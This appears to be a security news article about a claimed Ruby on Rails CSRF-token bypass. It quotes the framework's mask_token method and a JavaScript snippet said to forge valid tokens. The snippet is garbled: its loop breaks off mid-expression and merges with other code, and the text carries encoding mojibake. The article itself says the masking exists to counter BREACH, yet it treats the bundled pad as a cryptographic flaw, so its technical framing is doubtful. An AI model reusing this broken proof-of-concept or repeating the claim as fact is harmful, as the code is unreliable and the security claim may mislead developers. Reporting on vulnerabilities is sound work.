Security experts revealed a critical vulnerability in Ruby on Rails that allows attackers to bypass Cross-Site Request Forgery (CSRF) protections.
The flaw, disclosed on April 26, 2025, affects all current versions of the popular web framework and all versions since the 2022/2023 supposed βfixβ for similar issues.
The vulnerability emerges from a fundamental flaw in Railsβ CSRF token implementation. The framework generates these security tokens using a random βone time padβ (OTP) XORed with a βraw token.β
However, in a critical oversight, Rails packages both the OTP and the XORed token together through simple concatenation, creating what it calls a βmasked token.β
This implementation error means attackers can easily decode CSRF tokens and generate new valid ones, completely circumventing the protection mechanism designed to prevent cross-site attacks.
Since the cryptographic key (the OTP) is sent alongside the encrypted data, the security measure is fundamentally compromised.
Seclists analysts and researchers noted that this vulnerability represents a significant security risk for thousands of websites built using Rails.
The flaw effectively nullifies a critical security layer that many developers rely on to protect their applications from malicious actors.
The vulnerability was first reported by security researcher Daniel Owens, who provided comprehensive evidence of the flaw.
His disclosure indicates this is essentially the same vulnerability that Rails developers believed they had fixed in updates released in 2022/2023.
Technical Analysis of the VulnerabilityThe technical root of the vulnerability lies in the mask_token method within the Rails codebase. This method is responsible for creating the βmaskedβ version of the authenticity token thatβs meant to vary with each request to mitigate SSL attacks like BREACH.
The problematic implementation can be seen in the following code snippet:-
def mask_token(raw_token) one_time_pad = SecureRandom.random_bytes(AUTHENTICITY_TOKEN_LENGTH) encrypted_csrf_token = xor_byte_strings(one_time_pad, raw_token) masked_token = one_time_pad + encrypted_csrf_token encode_csrf_token(masked_token)endAs evident in this code, Rails generates a random one-time pad and uses it to encrypt the token through an XOR operation.
It then simply concatenates the encryption key with the encrypted data before sending it to users, violating a fundamental principle of cryptographic security.
Owens demonstrated the vulnerability with JavaScript code that easily extracts the encryption key and forges new valid tokens:-
function getCsrfToken(otp, raw_token) { var masked_token = new Uint8Array(raw_token.length); for(var i = 0; i String.fromCharCode(b)).join('')).replace(/=+$/, '');}This exploit allows attackers to craft malicious requests that bypass CSRF protection, potentially leading to unauthorized actions performed on behalf of authenticated users on vulnerable Rails applications.